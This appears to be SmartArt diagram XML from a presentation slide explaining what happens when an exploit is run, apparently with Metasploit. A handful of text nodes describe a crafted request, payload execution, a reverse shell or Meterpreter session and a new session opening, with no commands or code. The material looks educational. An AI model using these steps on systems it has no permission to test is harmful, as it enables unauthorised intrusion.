      <dgm:prSet presAssocID="{9FD842F9-04CE-4278-B5A1-979E6DF83D93}" presName="textRect" presStyleLbl="revTx" presStyleIdx="1" presStyleCnt="5">
        <dgm:presLayoutVars>
          <dgm:chMax val="1"/>
          <dgm:chPref val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{99FA9BAF-DAA4-487C-9CDE-F7FB09BFB829}" type="pres">
      <dgm:prSet presAssocID="{572E8631-D450-4DD5-BAE5-B90CBAA8ED05}" presName="sibTrans" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{36409C4B-6A00-4C65-BC39-D6AF3A8C08FB}" type="pres">
      <dgm:prSet presAssocID="{01A16D35-2AA1-4CDB-933E-13FDAE05ED9B}" presName="compNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{AB2D06B2-0039-4947-9D36-B19D4631C727}" type="pres">
      <dgm:prSet presAssocID="{01A16D35-2AA1-4CDB-933E-13FDAE05ED9B}" presName="iconBgRect" presStyleLbl="bgShp" presStyleIdx="2" presStyleCnt="5"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{CE51CDFA-5F7B-41E5-91BA-B1AC02899F95}" type="pres">
      <dgm:prSet presAssocID="{01A16D35-2AA1-4CDB-933E-13FDAE05ED9B}" presName="iconRect" presStyleLbl="node1" presStyleIdx="2" presStyleCnt="5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7BA8942B-DB18-40F7-9076-E75892C819DE}" type="pres">
      <dgm:prSet presAssocID="{01A16D35-2AA1-4CDB-933E-13FDAE05ED9B}" presName="spaceRect" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{A8F1CA43-BC50-4411-831C-5BCA646AC6ED}" type="pres">
      <dgm:prSet presAssocID="{01A16D35-2AA1-4CDB-933E-13FDAE05ED9B}" presName="textRect" presStyleLbl="revTx" presStyleIdx="2" presStyleCnt="5">
        <dgm:presLayoutVars>
          <dgm:chMax val="1"/>
          <dgm:chPref val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{12E9B322-FE40-4785-B2F8-F86D1600DA0A}" type="pres">
      <dgm:prSet presAssocID="{4364A9E0-8076-4D69-ACAF-FE0C1D5CB28F}" presName="sibTrans" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{EC70F527-5B58-459B-B4D8-C68F0FCD253D}" type="pres">
      <dgm:prSet presAssocID="{3D9C30F8-F88D-4A6C-9FE2-565F430C2D42}" presName="compNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{21E4A121-A6C2-48F1-AB56-0B8FEB0FB4EE}" type="pres">
      <dgm:prSet presAssocID="{3D9C30F8-F88D-4A6C-9FE2-565F430C2D42}" presName="iconBgRect" presStyleLbl="bgShp" presStyleIdx="3" presStyleCnt="5"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{12C9D7A5-2EAC-4583-8425-D181661BCF91}" type="pres">
      <dgm:prSet presAssocID="{3D9C30F8-F88D-4A6C-9FE2-565F430C2D42}" presName="iconRect" presStyleLbl="node1" presStyleIdx="3" presStyleCnt="5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60109A6B-C5FF-44D0-8F0E-0FD62F6AA66E}" type="pres">
      <dgm:prSet presAssocID="{3D9C30F8-F88D-4A6C-9FE2-565F430C2D42}" presName="spaceRect" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{7009CA6F-5CB8-4FE4-8DF5-A1BF8F25CD00}" type="pres">
      <dgm:prSet presAssocID="{3D9C30F8-F88D-4A6C-9FE2-565F430C2D42}" presName="textRect" presStyleLbl="revTx" presStyleIdx="3" presStyleCnt="5">
        <dgm:presLayoutVars>
          <dgm:chMax val="1"/>
          <dgm:chPref val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{CF264FD2-BF95-4D20-925F-CC7EF604A0EA}" type="pres">
      <dgm:prSet presAssocID="{ACD68654-7D09-47AE-9C15-345605DAD69E}" presName="sibTrans" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{2C25CA22-8E75-40B1-948F-07F1577B08B5}" type="pres">
      <dgm:prSet presAssocID="{FD2A2F1F-1B0D-46FC-A3FE-730A223D286C}" presName="compNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{AD04BF8E-EE0E-41FD-8F8D-269A39E956D3}" type="pres">
      <dgm:prSet presAssocID="{FD2A2F1F-1B0D-46FC-A3FE-730A223D286C}" presName="iconBgRect" presStyleLbl="bgShp" presStyleIdx="4" presStyleCnt="5"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{303ACDCB-32A3-4755-BE43-F47FA7FBF7F3}" type="pres">
      <dgm:prSet presAssocID="{FD2A2F1F-1B0D-46FC-A3FE-730A223D286C}" presName="iconRect" presStyleLbl="node1" presStyleIdx="4" presStyleCnt="5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VD player"/>
        </a:ext>
      </dgm:extLst>
    </dgm:pt>
    <dgm:pt modelId="{321F1F32-9603-418F-AEB8-2DE103927C2F}" type="pres">
      <dgm:prSet presAssocID="{FD2A2F1F-1B0D-46FC-A3FE-730A223D286C}" presName="spaceRect" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{F87513CF-937E-41BB-BCA3-1CFC5A1FEDEA}" type="pres">
      <dgm:prSet presAssocID="{FD2A2F1F-1B0D-46FC-A3FE-730A223D286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D6E72619-E541-46EF-95A8-E0D835804924}" srcId="{98E2CA23-5280-4788-B17E-1DDCAA82EA00}" destId="{01A16D35-2AA1-4CDB-933E-13FDAE05ED9B}" srcOrd="2" destOrd="0" parTransId="{7F7A988C-116F-4AF4-BB60-1B3AAC137D95}" sibTransId="{4364A9E0-8076-4D69-ACAF-FE0C1D5CB28F}"/>
    <dgm:cxn modelId="{B294BF70-F5B7-46FA-AABF-B71FF8D7E2D1}" type="presOf" srcId="{01A16D35-2AA1-4CDB-933E-13FDAE05ED9B}" destId="{A8F1CA43-BC50-4411-831C-5BCA646AC6ED}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/IconCircleLabelList"/>
    <dgm:cxn modelId="{96206B8A-9606-41E2-B89F-4D5CF0B13300}" srcId="{98E2CA23-5280-4788-B17E-1DDCAA82EA00}" destId="{3D9C30F8-F88D-4A6C-9FE2-565F430C2D42}" srcOrd="3" destOrd="0" parTransId="{CD55193D-ACF0-4A62-9618-313922E7081F}" sibTransId="{ACD68654-7D09-47AE-9C15-345605DAD69E}"/>
    <dgm:cxn modelId="{44A4AD8D-216E-4DE8-BFAE-E5A233657A03}" type="presOf" srcId="{7CF1CEB2-EE50-45C3-A379-882C7D8F50FB}" destId="{D79844BA-E611-463C-955E-E0748B6AA742}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/IconCircleLabelList"/>
    <dgm:cxn modelId="{6F5E478F-B6E6-4CA0-8229-05ED0860A50B}" type="presOf" srcId="{FD2A2F1F-1B0D-46FC-A3FE-730A223D286C}" destId="{F87513CF-937E-41BB-BCA3-1CFC5A1FEDEA}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/IconCircleLabelList"/>
    <dgm:cxn modelId="{2FD991A7-C65E-47CB-A2D4-E2E16BEDFC94}" type="presOf" srcId="{98E2CA23-5280-4788-B17E-1DDCAA82EA00}" destId="{4ECCCB50-338E-4265-AF05-72729829A28C}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/IconCircleLabelList"/>
    <dgm:cxn modelId="{DED3AAC4-4F0D-4B25-B0F5-0D95BDBD27B5}" type="presOf" srcId="{9FD842F9-04CE-4278-B5A1-979E6DF83D93}" destId="{A2F3AA57-7EF2-4E03-9BD4-638972A688A8}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/IconCircleLabelList"/>
    <dgm:cxn modelId="{0BDD0ECC-399F-42FB-A65B-A5277858C12C}" srcId="{98E2CA23-5280-4788-B17E-1DDCAA82EA00}" destId="{FD2A2F1F-1B0D-46FC-A3FE-730A223D286C}" srcOrd="4" destOrd="0" parTransId="{E4F40B03-5647-4B3E-8AA1-0B226147B519}" sibTransId="{868B6094-34C5-4756-B003-3E5D16F985E9}"/>
    <dgm:cxn modelId="{86AB57CF-E47F-4AC5-AB2D-DFA95891D523}" srcId="{98E2CA23-5280-4788-B17E-1DDCAA82EA00}" destId="{7CF1CEB2-EE50-45C3-A379-882C7D8F50FB}" srcOrd="0" destOrd="0" parTransId="{B64E9112-F0BD-4017-A86D-AFF5D7900A12}" sibTransId="{57164268-121F-423B-9DA6-800C95010096}"/>
    <dgm:cxn modelId="{351DE2E5-58DD-42D7-8FCE-918C9857A11A}" type="presOf" srcId="{3D9C30F8-F88D-4A6C-9FE2-565F430C2D42}" destId="{7009CA6F-5CB8-4FE4-8DF5-A1BF8F25CD00}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/IconCircleLabelList"/>
    <dgm:cxn modelId="{E7A575F9-B89E-4C74-99CE-582C0B054907}" srcId="{98E2CA23-5280-4788-B17E-1DDCAA82EA00}" destId="{9FD842F9-04CE-4278-B5A1-979E6DF83D93}" srcOrd="1" destOrd="0" parTransId="{BA113E8E-AF10-4446-AAB2-061CCEB9641F}" sibTransId="{572E8631-D450-4DD5-BAE5-B90CBAA8ED05}"/>
    <dgm:cxn modelId="{EF830C94-441D-475B-B867-A9E41D9E4029}" type="presParOf" srcId="{4ECCCB50-338E-4265-AF05-72729829A28C}" destId="{28945185-7314-4CC9-A5ED-6F5E269D187D}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/IconCircleLabelList"/>
    <dgm:cxn modelId="{F7F5935D-3DF1-49FC-A12A-3C4009D396F8}" type="presParOf" srcId="{28945185-7314-4CC9-A5ED-6F5E269D187D}" destId="{8A36D67D-4125-4F62-B6EE-74C5C42DECA3}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/IconCircleLabelList"/>
    <dgm:cxn modelId="{85EA9C0D-8B64-4FFB-A015-C31DA3AF4E2D}" type="presParOf" srcId="{28945185-7314-4CC9-A5ED-6F5E269D187D}" destId="{026F5BD5-D363-4AF0-887B-700C3502AE13}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/IconCircleLabelList"/>
    <dgm:cxn modelId="{6C26EADC-F1B7-428A-8D2E-E34001D43BF0}" type="presParOf" srcId="{28945185-7314-4CC9-A5ED-6F5E269D187D}" destId="{278D8E9A-4E7E-43CD-95D4-7DB2011EC909}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/IconCircleLabelList"/>
    <dgm:cxn modelId="{343B5043-A7A4-4791-9A9C-CC565EBA1C2E}" type="presParOf" srcId="{28945185-7314-4CC9-A5ED-6F5E269D187D}" destId="{D79844BA-E611-463C-955E-E0748B6AA742}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/IconCircleLabelList"/>
    <dgm:cxn modelId="{3EC9416E-649F-419C-AC81-704E332AD009}" type="presParOf" srcId="{4ECCCB50-338E-4265-AF05-72729829A28C}" destId="{4DD157A6-28F3-4B7E-BC5C-02A79C43EC44}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/IconCircleLabelList"/>
    <dgm:cxn modelId="{89517208-679F-4581-A556-D14BE5A949B2}" type="presParOf" srcId="{4ECCCB50-338E-4265-AF05-72729829A28C}" destId="{C83498F4-6228-452D-A3F2-DF99E666F9B8}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/IconCircleLabelList"/>
    <dgm:cxn modelId="{D0B72422-DA79-4B3D-9B49-98F87E66CEF2}" type="presParOf" srcId="{C83498F4-6228-452D-A3F2-DF99E666F9B8}" destId="{D70CC773-3A24-4456-87C7-2483D8CBEC72}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/IconCircleLabelList"/>
    <dgm:cxn modelId="{25858B23-34D2-4683-AAA5-7B4E6B1EF442}" type="presParOf" srcId="{C83498F4-6228-452D-A3F2-DF99E666F9B8}" destId="{B4C9E2E4-EC0D-4C5B-B9C5-3E82D936880E}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/IconCircleLabelList"/>
    <dgm:cxn modelId="{5DA4769F-D3FC-409B-ABB0-AD06BBFFB26E}" type="presParOf" srcId="{C83498F4-6228-452D-A3F2-DF99E666F9B8}" destId="{30B8F338-D7F9-4EB3-A9B3-3B99DB8B9D04}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/IconCircleLabelList"/>
    <dgm:cxn modelId="{586E0759-E575-4C61-9C40-42FA8AA68161}" type="presParOf" srcId="{C83498F4-6228-452D-A3F2-DF99E666F9B8}" destId="{A2F3AA57-7EF2-4E03-9BD4-638972A688A8}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/IconCircleLabelList"/>
    <dgm:cxn modelId="{C60ADA7F-9568-4F93-9E6C-68B11256D10C}" type="presParOf" srcId="{4ECCCB50-338E-4265-AF05-72729829A28C}" destId="{99FA9BAF-DAA4-487C-9CDE-F7FB09BFB829}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/IconCircleLabelList"/>
    <dgm:cxn modelId="{5543A1E1-69B0-4A96-A6B9-912AA40B2DA2}" type="presParOf" srcId="{4ECCCB50-338E-4265-AF05-72729829A28C}" destId="{36409C4B-6A00-4C65-BC39-D6AF3A8C08FB}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/IconCircleLabelList"/>
    <dgm:cxn modelId="{BD3E5821-91CE-43CC-A5E1-BEFD8F901284}" type="presParOf" srcId="{36409C4B-6A00-4C65-BC39-D6AF3A8C08FB}" destId="{AB2D06B2-0039-4947-9D36-B19D4631C727}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/IconCircleLabelList"/>
    <dgm:cxn modelId="{05B73320-BB07-4A2C-8702-4CE763CD37F9}" type="presParOf" srcId="{36409C4B-6A00-4C65-BC39-D6AF3A8C08FB}" destId="{CE51CDFA-5F7B-41E5-91BA-B1AC02899F95}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/IconCircleLabelList"/>
    <dgm:cxn modelId="{AA536489-C820-4F7F-97ED-D3304F2E1A13}" type="presParOf" srcId="{36409C4B-6A00-4C65-BC39-D6AF3A8C08FB}" destId="{7BA8942B-DB18-40F7-9076-E75892C819DE}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/IconCircleLabelList"/>
    <dgm:cxn modelId="{5CBE8D16-0778-49E1-B599-546FDE091EC9}" type="presParOf" srcId="{36409C4B-6A00-4C65-BC39-D6AF3A8C08FB}" destId="{A8F1CA43-BC50-4411-831C-5BCA646AC6ED}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/IconCircleLabelList"/>
    <dgm:cxn modelId="{8B2077CA-4B1B-486A-BF29-972AD2068FA1}" type="presParOf" srcId="{4ECCCB50-338E-4265-AF05-72729829A28C}" destId="{12E9B322-FE40-4785-B2F8-F86D1600DA0A}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/IconCircleLabelList"/>
    <dgm:cxn modelId="{A9A72F2F-873B-4E12-9DA6-19764598FCC1}" type="presParOf" srcId="{4ECCCB50-338E-4265-AF05-72729829A28C}" destId="{EC70F527-5B58-459B-B4D8-C68F0FCD253D}" srcOrd="6" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/IconCircleLabelList"/>
    <dgm:cxn modelId="{0483A1AA-AEBA-4C80-AB25-991AAEEB77CD}" type="presParOf" srcId="{EC70F527-5B58-459B-B4D8-C68F0FCD253D}" destId="{21E4A121-A6C2-48F1-AB56-0B8FEB0FB4EE}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/IconCircleLabelList"/>
    <dgm:cxn modelId="{8E05198C-0228-4E5D-8FD8-14C9B7B1C46B}" type="presParOf" srcId="{EC70F527-5B58-459B-B4D8-C68F0FCD253D}" destId="{12C9D7A5-2EAC-4583-8425-D181661BCF91}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/IconCircleLabelList"/>
    <dgm:cxn modelId="{2F2EC73B-C9EE-4EDE-8D64-1D4BE3DE4A9C}" type="presParOf" srcId="{EC70F527-5B58-459B-B4D8-C68F0FCD253D}" destId="{60109A6B-C5FF-44D0-8F0E-0FD62F6AA66E}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/IconCircleLabelList"/>
    <dgm:cxn modelId="{9DEB6F7D-A76F-4BAB-B29E-C1F22C291C8F}" type="presParOf" srcId="{EC70F527-5B58-459B-B4D8-C68F0FCD253D}" destId="{7009CA6F-5CB8-4FE4-8DF5-A1BF8F25CD00}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/IconCircleLabelList"/>
    <dgm:cxn modelId="{483227E7-8883-4DA3-BB32-5FC15B419796}" type="presParOf" srcId="{4ECCCB50-338E-4265-AF05-72729829A28C}" destId="{CF264FD2-BF95-4D20-925F-CC7EF604A0EA}" srcOrd="7" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/IconCircleLabelList"/>
    <dgm:cxn modelId="{9CD9D54B-BEFF-43B5-A9E0-AD6D1D6CBD34}" type="presParOf" srcId="{4ECCCB50-338E-4265-AF05-72729829A28C}" destId="{2C25CA22-8E75-40B1-948F-07F1577B08B5}" srcOrd="8" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/IconCircleLabelList"/>
    <dgm:cxn modelId="{5202ED29-CF94-4963-9CF4-B0FB8E15EEF5}" type="presParOf" srcId="{2C25CA22-8E75-40B1-948F-07F1577B08B5}" destId="{AD04BF8E-EE0E-41FD-8F8D-269A39E956D3}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/IconCircleLabelList"/>
    <dgm:cxn modelId="{A1DC51A5-AB7F-4753-815B-5C823BF3AC5E}" type="presParOf" srcId="{2C25CA22-8E75-40B1-948F-07F1577B08B5}" destId="{303ACDCB-32A3-4755-BE43-F47FA7FBF7F3}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/IconCircleLabelList"/>
    <dgm:cxn modelId="{5CBEA2D9-E2B7-4835-AC5C-B3C93C7BBE2F}" type="presParOf" srcId="{2C25CA22-8E75-40B1-948F-07F1577B08B5}" destId="{321F1F32-9603-418F-AEB8-2DE103927C2F}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/IconCircleLabelList"/>
    <dgm:cxn modelId="{9B0A1BD9-4346-47B1-8AF9-0F9DE2496B44}" type="presParOf" srcId="{2C25CA22-8E75-40B1-948F-07F1577B08B5}" destId="{F87513CF-937E-41BB-BCA3-1CFC5A1FEDE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39F4DDE-B489-4E59-AD25-D4EBE66CAB40}" type="doc">
      <dgm:prSet loTypeId="urn:microsoft.com/office/officeart/2005/8/layout/default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C44AF5C8-3080-43A1-99F4-EC4602F502D2}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-IN" b="1"/>
            <a:t>CMD - exploit</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{ED87C256-AB52-4214-AE9D-3A976F2387C0}" type="parTrans" cxnId="{2FC9CC96-69D7-4E30-A2C2-A9446CFC78BD}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{515A94DD-54EE-4004-9A3B-AC9C5C3C2D51}" type="sibTrans" cxnId="{2FC9CC96-69D7-4E30-A2C2-A9446CFC78BD}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7E7247DD-9DBA-440D-AB68-17E22E1FE15C}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-IN" b="1"/>
            <a:t>What Happens During This Step?</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6AA2552D-4818-4A32-B611-E8C7A1DC1C08}" type="parTrans" cxnId="{54F19795-76B8-412A-A82B-0215F36F188E}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{9FFD5FA6-3660-4D6A-95C9-F2BC366F3F11}" type="sibTrans" cxnId="{54F19795-76B8-412A-A82B-0215F36F188E}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{DDEC787C-ADCF-47A6-BF3A-08D2F9734E01}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-IN"/>
            <a:t>The exploit module sends the crafted request to the target.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{9E788F8C-7BC0-40CD-BF00-472DF3C8A0FA}" type="parTrans" cxnId="{444A2A71-C8A1-4DE3-B866-FF6A6E84C737}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{930CC149-9111-47AC-A41E-F89FB232510B}" type="sibTrans" cxnId="{444A2A71-C8A1-4DE3-B866-FF6A6E84C737}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{2BF837AF-0125-4742-9B70-627991CFBE1D}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-IN"/>
            <a:t>If the vulnerability is present and everything is set correctly:</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7591A036-7101-4364-9058-998790E61839}" type="parTrans" cxnId="{E6B3CABD-0861-42D8-9A55-88D86EAE0560}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5453956D-5682-4FE2-8F29-6028FCF32323}" type="sibTrans" cxnId="{E6B3CABD-0861-42D8-9A55-88D86EAE0560}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C8A1B580-0DBB-484B-B503-903BA19CC479}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-IN"/>
            <a:t>The payload gets executed on the target system.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{83701141-22FF-41F0-8673-D1F4844FBE6C}" type="parTrans" cxnId="{90FB3E31-351E-4961-8939-F7991CF7E3AE}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{9F9EFE67-83D0-4F2C-9DE4-2EF152D35FE2}" type="sibTrans" cxnId="{90FB3E31-351E-4961-8939-F7991CF7E3AE}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D25FE60C-533D-485D-968F-9D566DD82DC1}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-IN"/>
            <a:t>The target connects back to the attacker’s system (reverse shell or Meterpreter session).</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{EB711B7C-689F-4BD5-BA18-B3B9A4043182}" type="parTrans" cxnId="{C7DEC2D8-4B3D-4653-BD15-8F761EFB18E4}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3A972533-9860-46BA-A252-11BC830C760C}" type="sibTrans" cxnId="{C7DEC2D8-4B3D-4653-BD15-8F761EFB18E4}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{23C471B6-4934-4584-A1E1-85E7C19CC642}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-IN"/>
            <a:t>A new session is opened if successful.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C0E488F4-EEC9-43B9-94E0-15498A51E92E}" type="parTrans" cxnId="{1071CC14-A7C4-40C0-B723-C3F02AD5D77C}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B70102CF-D4D3-4AA9-9501-B4423E2F5C4F}" type="sibTrans" cxnId="{1071CC14-A7C4-40C0-B723-C3F02AD5D77C}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{BD5F18FC-F87D-014C-A0B0-FC954A8A8913}" type="pres">
      <dgm:prSet presAssocID="{339F4DDE-B489-4E59-AD25-D4EBE66CAB40}" presName="diagram" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:dir/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{7A88CBA7-A0C7-B94E-A860-0F32666094B0}" type="pres">
      <dgm:prSet presAssocID="{C44AF5C8-3080-43A1-99F4-EC4602F502D2}" presName="node" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="7">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{9D037208-36ED-604E-B425-686286831FD4}" type="pres">
      <dgm:prSet presAssocID="{515A94DD-54EE-4004-9A3B-AC9C5C3C2D51}" presName="sibTrans" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{EC621C7B-5E88-114F-9A92-F65FE84328D8}" type="pres">
      <dgm:prSet presAssocID="{7E7247DD-9DBA-440D-AB68-17E22E1FE15C}" presName="node" presStyleLbl="node1" presStyleIdx="1" presStyleCnt="7">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{7D7B6C12-9A3F-BB45-B73A-9E976B760B27}" type="pres">
